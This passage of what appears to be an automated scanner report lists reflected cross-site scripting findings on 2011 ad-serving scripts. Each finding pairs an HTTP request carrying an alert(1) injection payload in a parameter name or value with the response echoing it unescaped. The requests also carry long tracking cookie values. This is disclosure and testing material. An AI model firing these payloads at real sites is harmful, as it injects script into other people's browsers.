Host:	http://imp.fetchback.com
Path:	/serve/fb/adtag.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83b6b"-alert(1)-"3d5d44cdfea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /serve/fb/adtag.js?tid=55445&type=mrect&clicktrack=http://ads.undertone.com/c?oaparams=2__bannerid=174883__campaignid=28335__zoneid=14739__UTLCA=1__ptm=1913__cb=e1f5c26e1c224759999ea3a6af27c9fa__bk=lkxrxc__id=bciwrb9g5enz8qa0fio0m3ke7__oadest=&83b6b"-alert(1)-"3d5d44cdfea=1 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064833_61548615?t=1304957839488&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.sfgate.com%2Fcgi-bin%2Farticle.cgi%3Ff%3D%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uat=1_1304506950; cmp=1_1304903354_13521:0_11051:0_13981:208292_13479:208292_15758:367625_12704:367625_4895:795810_10164:1160086_10638:1160086_10640:1160086_10641:1160086_1437:1160086_1660:1723682; sit=1_1304903354_3006:489:0_3455:208292:208292_2988:430572:396401_3801:543015:542595_1714:827548:795810_3306:1055174:367625_719:1160913:1160086_2451:1211782:1206682_3236:1369745:1369627_782:1724031:1723682; bpd=1_1304903354_1ZunS:78_1ZCU5:4QUb; apd=1_1304903354_1ZunS:6O; afl=1_1304903354; cre=1_1304954974_24309:52570:1:0_24308:52572:1:2_29805:59534:2:5300_29807:59535:1:5305_29802:59536:1:594003; uid=1_1304954974_1303179323923:6792170478871670; kwd=1_1304954974_12936:259912_11317:1211706_11717:1211706_11718:1211706_11719:1211706; scg=1_1304954974; ppd=1_1304954974

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 16:18:42 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1304957922_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 07-May-2016 16:18:42 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 09 May 2011 16:18:42 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 439

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=55445&type=mrect&clicktrack=http://ads.undertone.com/c?oaparams=2__bannerid=174883__campaignid=28335__zoneid=14739__UTLCA=1__ptm=1913__cb=e1f5c26e1c224759999ea3a6af27c9fa__bk=lkxrxc__id=bciwrb9g5enz8qa0fio0m3ke7__oadest=&83b6b"-alert(1)-"3d5d44cdfea=1' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

2.105. http://imp.fetchback.com/serve/fb/adtag.js [type parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/serve/fb/adtag.js

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b687a"-alert(1)-"7639149ef14 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /serve/fb/adtag.js?tid=55445&type=mrectb687a"-alert(1)-"7639149ef14&clicktrack=http://ads.undertone.com/c?oaparams=2__bannerid=174883__campaignid=28335__zoneid=14739__UTLCA=1__ptm=1913__cb=e1f5c26e1c224759999ea3a6af27c9fa__bk=lkxrxc__id=bciwrb9g5enz8qa0fio0m3ke7__oadest= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064833_61548615?t=1304957839488&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.sfgate.com%2Fcgi-bin%2Farticle.cgi%3Ff%3D%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uat=1_1304506950; cmp=1_1304903354_13521:0_11051:0_13981:208292_13479:208292_15758:367625_12704:367625_4895:795810_10164:1160086_10638:1160086_10640:1160086_10641:1160086_1437:1160086_1660:1723682; sit=1_1304903354_3006:489:0_3455:208292:208292_2988:430572:396401_3801:543015:542595_1714:827548:795810_3306:1055174:367625_719:1160913:1160086_2451:1211782:1206682_3236:1369745:1369627_782:1724031:1723682; bpd=1_1304903354_1ZunS:78_1ZCU5:4QUb; apd=1_1304903354_1ZunS:6O; afl=1_1304903354; cre=1_1304954974_24309:52570:1:0_24308:52572:1:2_29805:59534:2:5300_29807:59535:1:5305_29802:59536:1:594003; uid=1_1304954974_1303179323923:6792170478871670; kwd=1_1304954974_12936:259912_11317:1211706_11717:1211706_11718:1211706_11719:1211706; scg=1_1304954974; ppd=1_1304954974

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 16:18:29 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: uid=1_1304957909_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 07-May-2016 16:18:29 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 09 May 2011 16:18:29 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 436

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=55445&type=mrectb687a"-alert(1)-"7639149ef14&clicktrack=http://ads.undertone.com/c?oaparams=2__bannerid=174883__campaignid=28335__zoneid=14739__UTLCA=1__ptm=1913__cb=e1f5c26e1c224759999ea3a6af27c9fa__bk=lkxrxc__id=bciwrb9g5enz8qa0fio0m3ke7__oade
...[SNIP]...

2.106. http://investingchannel.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://investingchannel.us.intellitxt.com
Path:	/intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ade7'-alert(1)-'d356660811 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /intellitxt/front.asp?ipid=30710&6ade7'-alert(1)-'d356660811=1 HTTP/1.1
Host: investingchannel.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.americanbankingnews.com/2011/05/09/morgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwQAAAEv1YxUFQA-

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwUAAAEv1Y4olwA-; Domain=.intellitxt.com; Expires=Fri, 08-Jul-2011 16:19:14 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwUAAAEv1Y4olwA-; Domain=.intellitxt.com; Expires=Fri, 08-Jul-2011 16:19:14 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:19:14 GMT
Age: 0
Connection: keep-alive
Content-Length: 11740

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...
,ask,live,bing",
'ids.aol':"10",
'fields.aol':"query,as_q,q",
'fields.ask':"q",
'fields.google':"q,as_q"};
$iTXT.js.serverUrl='http://investingchannel.us.intellitxt.com';$iTXT.js.pageQuery='ipid=30710&6ade7'-alert(1)-'d356660811=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();};
}

2.107. http://js.revsci.net/gateway/gw.js [csid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 9e673<script>alert(1)</script>737368f0232 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=G055249e673<script>alert(1)</script>737368f0232 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.thestreet.com/story/11111015/1/citigroup-shares-should-be-avoided-analyst.html?cm_ven=GOOGLEN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9CEJZjpv597JwPKJxC5gdVtCsylMowZVqFba93uE88QJ2vEqavgLcjsVMcRzx4ED/5y/VyTHIsMSIcx9P6/4Ptk7h7/kVBVRsmPoQ0hw3VqPpohQo6GreQTT2sfEif6/0pIL0JzPlqxK/xCHAtVfwdzEObtB3R+kx6vG3EsVv0K6pa5EEfSjOEijp9JtgQuc80ODTwi9NXDoTFNrxL8DDV3LkG2ZlqgCsiMORZ7xtrlmdgDHXcEbiYO6qzTakYWjU1ZI41JlwUO4LjBzsT2D88kEjz3zmJ8hYbJGh1xyWW+UKaN09mmhPt32izj+/bKvjbrFgyQt/gHgqsHSif0Ljdj+Q+A2KW90kaRcD0u9x1EWeGeDMNGnTxPsE4tZ29anP3V6HEHjSJzazKL2rLcDUyf1nOSiLrNKvMGZy+updNolU6VfrcAEA50kEg5b0ry5ei+qINqcO3xtTm9TzAlYqEHt/B53V+aryoPP39r9u4zReLY8geTRwwQDQoUeFJK0VDze8TYHKopng5lI2IkLISmZpypd7z+PhZGTiVr/e71zH/aQ3cDow0MzeLrze9TNge7GDhMK6Bxp9UlfjqHnCsR4zVPeIGrNxYURde9tIPz2ywkaWvKuHeu3aZqbw99oPf8zFzHxalafDxEC1mpcT487MYW5ku2dYRpKun7/Vx2AmYtjjJZcw/Z7WPMdXFLRW0a+mYubwHQRGsryV6eOV2vucJ+9xcq5ePJY/SCdmygrB1hYdRvSvcA+H1YrVpKWkbx/mbVQNRJyzgrdhxEMtMK1ZRTPoMuQtWSRn15LI9VI0tALzj5GlA/mo3wCuowH0fqvpBMU4f8t0gzZ8rRRSzwN8F12lK5YOv/zVoTou/ePU7fmDdcNrozd1isyC8ofB8v78w8ken9uIKsLkaD0FMrErnHIj4ErUxwK2H48tWjHdUsMCBED6QhPMXgqJDq3TkeQotpr6J5ZMwovC6u8L4DdC+06l7SyydDIk1HlIZrnXKZ1ygMTDy022fJhsEKgAakdMjLC0OCblO9QRztpyP91LyCx2NNTHKhipvnSGX8+fjzLDla7c86b6KLCwnsmsBclRjcDRQzQuAmX61hD6hx7DU19GH24WbSkpEWb77+sox6USQzlngCf8gtpoCeaObTlK+6twUC8KE3/pqTXp2zQOL2yqn0NuAlLOx0XPo5tc4MojAgLCLg9jTmGJYqcd09ZSFlJHlYslUdxgHavCHjX8nzxWJZTzBBdTDQAE/XS1cyO+O6K5J9H/bkeEUcLT8G7WRyvwtsEzIn/l4x3lucy+df5rxwQyeFQPQaFNDtAJVIavzhtODiLsyWRg8/+s/4Jz8SGadvjXdPqIpwtPfk5s2RLg33k+48MGcWoRatsU9lJtr7sV9inc2hxQDRfC4DoCqu3z6jJjDF/I0bMRHjwceJSAcNCVgL6lC7o1U55tTB3dBI28epY73ix7AhT8mm7KJzbs1qdEKXKcEqeuoES5n8Im+vrybBEhH2keazFxEu04456aq/HKQ==; rtc_MAW-=MLvn9jMxZgpr566eiyx8oEqJzD+AU6uUhB/7wL6QA7wKgV2A/F/L4guEx4+63fCdtIxef3kolwdxJ+ZdqJaP5Bw5ezuuZ7VhzYvhK3RnEaoo8fCpo56bQW3d2JkH+p7YTIrshKO0zQpeA+I+JKlyK1joTrNawnjQF2pr2YW1G6DfLrxMRMnD6ZJbht4/rGTY9j+0I4G5t6ycWDGUh6CWxGP+R+UgAiUYbfRgzuwfaQ7q7nyfBLIETtSkpW3O9Rszot9rypt79BX3Qp4V1f8AooVqC6n2LUJCrm3NHSYWbVxFpLHwnanm7mExFG1EJ/XKSaG8ksNhdbrDS4W7xY9HIIaBoq2vDoUpDxFEuZA4Pz6QSDYKX/6dGsWOonK3WvxG0GtSDDP37+a5NUUko84gPNQEJIYXRil7JOXuqXTRaziRw16Z2jyrHhtgl4Hzp4rh3ZSDBgC8i9ZIe+Pb9MRmUoiJuotqgTFkw4/yU97xRMxqFSkYkOnRuZH/1ygBGw2dv0n7H7uEH5flcEjLupY7Zc9573kWnSd+mPktuAj5wr/rqRPmm0TdmBzpN6ue39amFLLV/jvjnoKqHwNAsKu4CKgSoPFsNuLGBh9AGYlVex507QAUsD7c+pqY3SrK/Z1ehkMicxvW6Qu5H+wITxW6kpmPYkLiorp5rYAKVDZT0dEXWN3URkC1N7tR+85ZRfNKlmz4KRvz7X79Cx7vgj11Zlj2Rk2gUEJG9t5jWCAREYo8X1W73fXuEak1l3ZhzbS51qZHi7zCHQ7UcAOeCPwjI5YG4Psrff6Yx9BQjoojWCbugVyEdsBGFJVTgwNAqxwx7Xa76uJqWrEETcN1dkEiPunvL5GaNIC48NNmDMkZknqGXVG7QWS/tPd+XNISV07Wc2QLS0L0pYCB8qfxyfYJ939qqsx7N5uMha1Uig/8AR/qi3AYzgw0MRhjc4EownMqI6O2dsyH0ANM2MMb6bu1x+C8wlWVzuDvA0K7WWePbpQDU+yL3DWRogviTQHv+U+0NcAz2EwTYIPcAtaU9Xvt3vL+oq+SU+Ja6kRg38HjAS+NypuYV6TGb2XB6v7+bWEGyFBqvLXwle22Tn5Rd15tRrvNWG+SxVSP3Qylxe7lTmcmA594zRv3nBDORL24HQnmwdbOaaF9gJHXm01FVInr6Vua2yH1AjQTGDiaYyZKQ4zoZxbSVxPs/mzfMLsfWL4izMZL0N3FpuWimjOrVJhesbNr4dLvJgqjfBX51ZKZB1/fIoMZA8d4+t/dNnwnhZxOz+Zaep5AJkIOjlJEtouigIhvBBiND0s5QtDqLrvZ2m+vd/0gKM1jlKBgRH3M5vFbquchu4+Kmyzysu1mBaHaF8ebEuZuGZ4wTlhsvAs+exirzjesYMTFwDpdoFnLUkh22768SOf4v4eYZF13JwMDr6TtEYZSYqiUFx79EfoxawHi4hvLBPfFB/QQ7pJac74r8gtLfvP7njrsHVE+pi9o8pq9sRZByTnKl6P9FFrPm29mIJhkC3vQPK/b7ZZpdmtZIhVo2HnQLYkGlK+lp+bWVK3JW4a0k+uukHze5VMfetxIwGiJdOAV5d/1We9jI/1wSqfqRDJZlDqBnbmfyqnpGgM+XlIN8Eg1wct+itKA+qcdzqwHMBFN4C80mc2O8bzy/RN1uInzoiJn2ZI+3DWbgkdYE7DCtnNBYhhlKwsM5ZOHTdaCS3xZoKnIE3Ls8bEW++CsxMMqsugE1km4irt34sG4xy/OGasuktNbM984YltiWA8nJRaj7F4xvcPQX77Gw1p/61oCwJq7/JohFzZwk5lLllWUv2bFJOl1YxkHjgPaNuVNOqR8tptwC9ShAsCyNKH/yJ8P6EUbUjwYTKBdWAY5OuKGjUeVFtZFcthEhdMAuB6vba6q4/+Owre3t2SUZBNgCtHzKe/JQR5kUBLM9Ovq0HpInOQvlmwPpkFx; rsi_segs_1000000=pUP148+huHIQT7uItGF25DD9Qs21FubrqKYNLkhA6QNisncWno0sxA7nqrpfEV5FVCCIgeqFJVMnu4UytOrzC5PFmmkf+4o6Y4kWUVRYijgBM8L3EMAgE+FE1zRWX6p4UKmQyX3jPh6M3uOveseh2iY1ZBv1vMKSAJATDcXxMRze99i26JYZV3rMFa32xFSASYLGSq9gA2wqxo6jFN55OcpExrtUcqV/WE7VrxgkcJhDNFSFDCMHRAadeMddAshxEQKHkNamYl8e7q6/132O1GZkTJis3CpMm9CE5wxy3BhzNuF38pD1o6TTq2Ej+L1FRUw8NeuxpXpIi6ZmOVbVtQiYYOy7o4sqHfDeYuqX2JgIswsSIsM2hKQHdI/MNx90IpWYpUFyYhuxs8sGIlNIYlI+nnvPtRSIEjbMnhZF4rDPdG+C1lCpMG+cc2xFLLFhbNBfcEYBzrv0ZmI3OiuN0vHQrFA6dfyVScu+IQaO/CA64crcfalTJsd8tUtIzF168BEFwks3tPsoEjTiCpPEISq5xujQHUH/MMKf52yITJHL/cJWhzL4JXhtO2ICgsbnTjb/rrYaY5bzER35kZmWcaQsJ+4CPF2yB1gubjAliQ==; rtc_wnGt=MLvn9jMxZgpr566eiyx8oEqJzD+AU6uUhB/7wL6QA7wKgV2A/F/L4guEx4+63fCdtIxef3kolwdxJ+ZdqJaP5Bw5ezuuZ7VhzYvhK3RnEaoo8fCpo56bQW3d2JkH+p7YTIrshKO0zQpeA+I+JKlyK1joTrNawnjQF2pr2YW1G6DfLrxMRMnD6ZJbht4/rGTY9j+0I4G5t6ycWDGUh6CWxGP+R+UgAiUYbfRgzuwfaQ7q7nyfBLIETtSkpW3O9Rszot9rypt79BX3Qp4V1f8AooVqC6n2LUJCrm3NHSYWbVxFpLHwnanm7mExFG1EJ/XKSaG8ksNhdbrDS4W7xY9HIIaBoq2vDoUpDxFEuZA4Pz6QSDYKX/6dGsWOonK3WvxG0GtSDDP37+a5NUUko84gPNQEJIYXRil7JOXuqXTRaziRw16Z2jyrHhtgl4Hzp4rh3ZSDBgC8i9ZIe+Pb9MRmUoiJuotqgTFkw4/yU97xRMxqFSkYkOnRuZH/1ygBGw2dv0n7H7uEH5flcEjLupY7Zc9573kWnSd+mPktuAj5wr/rqRPmm0TdmBzpN6ue39amFLLV/jvjnoKqHwNAsKu4CKgSoPFsNuLGBh9AGYlVex507QAUsD7c+pqY3SrK/Z1ehkMicxvW6Qu5H+wITxW6kpmPYkLiorp5rYAKVDZT0dEXWN3URkC1N7tR+85ZRfNKlmz4KRvz7X79Cx7vgj11Zlj2Rk2gUEJG9t5jWCAREYo8X1W73fXuEak1l3ZhzbS51qZHi7zCHQ7UcAOeCPwjI5YG4Psrff6Yx9BQjoojWCbugVyEdsBGFJVTgwNAqxwx7Xa76uJqWrEETcN1dkEiPunvL5GaNIC48NNmDMkZknqGXVG7QWS/tPd+XNISV07Wc2QLS0L0pYCB8qfxyfYJ939qqsx7N5uMha1Uig/8AR/qi3AYzgw0MRhjc4EownMqI6O2dsyH0ANM2MMb6bu1x+C8wlWVzuDvA0K7WWePbpQDU+yL3DWRogviTQHv+U+0NcAz2EwTYIPcAtaU9Xvt3vL+oq+SU+Ja6kRg38HjAS+NypuYV6TGb2XB6v7+bWEGyFBqvLXwle22Tn5Rd15tRrvNWG+SxVSP3Qylxe7lTmcmA594zRv3nBDORL24HQnmwdbOaaF9gJHXm01FVInr6Vua2yH1AjQTGDiaYyZKQ4zoZxbSVxPs/mzfMLsfWL4izMZL0N3FpuWimjOrVJhesbNr4dLvJgqjfBX51ZKZB1/fIoMZA8d4+t/dNnwnhZxOz+Zaep5AJkIOjlJEtouigIhvBBiND0s5QtDqLrvZ2m+vd/0gKM1jlKBgRH3M5vFbquchu4+Kmyzysu1mBaHaF8ebEuZuGZ4wTlhsvAs+exirzjesYMTFwDpdoFnLUkh22768SOf4v4eYZF13JwMDr6TtEYZSYqiUFx79EfoxawHi4hvLBPfFB/QQ7pJac74r8gtLfvP7njrsHVE+pi9o8pq9sRZByTnKl6P9FFrPm29mIJhkC3vQPK/b7ZZpdmtZIhVo2HnQLYkGlK+lp+bWVK3JW4a0k+uukHze5VMfetxIwGiJdOAV5d/1We9jI/1wSqfqRDJZlDqBnbmfyqnpGgM+XlIN8Eg1wct+itKA+qcdzqwHMBFN4C80mc2O8bzy/RN1uInzoiJn2ZI+3DWbgkdYE7DCtnNBYhhlKwsM5ZOHTdaCS3xZoKnIE3Ls8bEW++CsxMMqsugE1km4irt34sG4xy/OGasuktNbM984YltiWA8nJRaj7F4xvcPQX77Gw1p/61oCwJq7/JohFzZwk5lLllWUv2bFJOl1YxkHjgPaNuVNOqR8tptwC9ShAsCyNKH/yJ8P6EUbUjwYTKBdWAY5OuKGjUeVFtZFcthEhdMAuB6vba6q4/+Owre3t2SUZBNgCtHzKe/JQR5kUBLM9Ovq0HpInOQvlmwPpkFx; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; rsiPus_O9a7="MLsXrqEubghv55A4WwmsZyXO5dh1YsLXsqmJC5K5BG/1uhNG/EwqXxq2cmqJdTC28e3p9XwX/SgxLcMgai3AlovOJcILTDkBzTZiOfAVJYZD4qDlToh3CM8eea7r4o3FmxhcmYFYZ/X/gdDuIaoIdNbW8BzRrbZ3KibFutWcwyejFl2M+JlZIYOotYYZ9XL1YsuxybkcVW9OfkqtxRfrC3EorY9HAZmeHSYZ5pASMPraOdzbgyH3da+IfcfXeiYJU/AQw1QoR7n5p9h0WgbYp3H/YQVFWkce/yXo26QoOW9RZHsrc2X37Dh3AhbLtzG2UV/sjEQDaI7STCY9+wQmfhGAU/A7lDpJb0+sf9oCjlDmuz+eOMbcFe0tYte8VsmVl8IsfJ5+eDoeOTnZUhLzLyKTo9S/67gtXhJnakg3V+I1E3Z0nTXP5M7K0xV1QJRco2+WcW/Sz+Z9gBnFqIzjl2/3RvnsKGN7WnlaIuR8/80b+TMGalNvH5U8ArkyMTKjy9yaYlIxWkU1B3OzcRhdzQcm8xeCNpQft2axG70GLUeSkMlBVxJYj0Jx0dKUUEthF9QUDQ4fU5fUlT8CJnSNsex+2AttH/7rX82dE7znU7sOLb6q2IBllEoWr6LtFLr1TrVJY0Ya9C++660qdNWa0RQudPWnK5XP0EWM+Rei9y68BXlDc7B+USmhMYdQwOf0hx320NTMpXFtWt060cHXR4yLk7rnZ48fktuQIaYZX1FfFZmcm5FIOMcrfoBWPUTQmhZnMsmO4XeI3NRuMsoq8mp5fphIW1DX2rpki8F+QdPUV4meufcUPjDEB+gAAjNhHJhG2JeufYWg1FmfBSBA0xsidkkdOGsk6STKPcTk6u4agZzwD8+dnluTdonGov24hSlUgf4RidhvjTDlu/A8EXmxw5i3+KwXNCSgTFfoHAH/Ko9YZQf+337HgBsiBKjoypdAqucYKGYtyYhcp5QAeqozTrK2krWo3XIpuWADRInTmrHetPkaXoS6smjt4nJDmB0zDQob+oMKk1M7h04Tah5/ca0xJcw9lw4uZoXcruiT+nuXMeo9Tdpysl7P5l60n9OiOcz/y24J7wyNTx9iDwXJJXx+uTHqPmXhxlhiiEuE3D74+0buAqTzM4OkInepqzqiFOf8PlTMt6G4r6iyg+0LVXQRbQ=="; rsi_us_1000000="pUMFIy9HNxYU1H093qwgIlX9ItSjBNAmRVtcyab1f6NcHhwDrJNmJKGIIDHH+tKu9m5kSG88H0w8eK4FBGEF4XE+Gu7ylMiMgTmPptBDSlP91y0fCG56CJl8SXVSGXR17PRjFKdi/QiApdSGhbKxJlBXbBZ1gnBXumwhUX8g73Gjz+E7sI9rTV22SRWjsOgMPSJORFTcqHPynUtNyX7zpiw/Sa2Wjd12b75GuyywDgZRYFxvvBtUTWj4QO6zMtamg+iStd8g9axh/B8+qciOFEd8L5TlR49tULQXfSoNNlLjb4ngt82kivYXJhFeLoYQTcYdMOxas1fCQvUTUCNThgI6YJ+7NYTdtkEVIJYdRfpoXFaS63l5VtHWN5r/5UOdUUe9IkUIB8iZe2i9EGPXfgo12BD7Iz8hvcW1xk+3kkPpymCjxc6g8iYw7+z08OJWlqTw/Uafr+P6q2n2G6n49ie/g7ZORCktIAoeBCD4W1eli0QftqAojZKdoLudVXm29oO0leSATWgIv7vktQecdf0srRCcb7Ylia26Z8qpzfUOY1HU/t0LUrhH0MgyfcJe7O04AEDL07szUd5vbyBOcxp1E+hu5dLJgeWXKpmBAUARVVZSeES5CoCk9OKHiSK43kGfkFnr7Pcc03IFQVb3iOwh8jHfiMk627LMm53MFMCLrnwXSh5e90Wk1b0+F+tu+5kBjLIjZ9UAvioUZoF+wYPJSDiLnBgq+CgI3nvIez8+180FKTj+viGptNktqUvMGFZGNOMTGC0Rhg/ob8fdT0f9uSZCBTh2mRLN8yHlv9uQslOtibIh+hwTAVbMKKdar196IKF1eFJyg0QQnjOjJ+Jl1im2z19AExXj+itzi3lBW3qg1kiBnYZ+YaYJkCCdXSTYLw40EW/8PsGSjl6pyfnB/NJR+PwrNq2nVbJm5HGJVhd7mDrVy1KBcjPzFUlK3AZqQn1WS7oi9HEz6zIkWFPA2vgpNTK369D/6gyaEUVuR+eOVBzUCOJ5KPkc3MPagdjXv4uavmcYPiz5qci87KJwcLkGSPlfTpLVSvK0kZoANuQurqhf89d1gm8cUC+m/VmYep4i6uLKXY5SDp1wge+GODkI5BY1vHgCZ4cE5CKRaex5ta9hJVR9IpRGMjEFxkRaPfTnq/afJpDciCrLqRhyiIN25MkRj/8yNtVzuSk4q9RYvB44oY8dgdq7JXADkudWtoNKk/GkpQ1MAQRQKnWxfHx79ufT0VOO/8/fk3xWBMivBESRKKj2Evriufrbi4XHS+AlNg/oFKG55MPxtZO+mARehxgO3ekbFyytNbg7fJExy4VvNWuTdw6OPR6ycGmQvMVS/66k5F6+L2h1xZi03SPQfU5NWAbD+DLIlAD5j8G1ykmM9DsGm1DRFnpmaocKuUbvQ+mBuUH2/kSMGgnX51kaVk6KGCzjHpEyHGom50DPqLw7tRWT9hYKiZyP+tzpqzBZoXgZU8jxwKpXoqCjdsKvorMTx20enwddwl7D2vgAtjKbvFMM7PkyYoc6C7QRdyJMawfln/DY0Ot6zJdI8uW9c7pQD9fpdOTwYd3X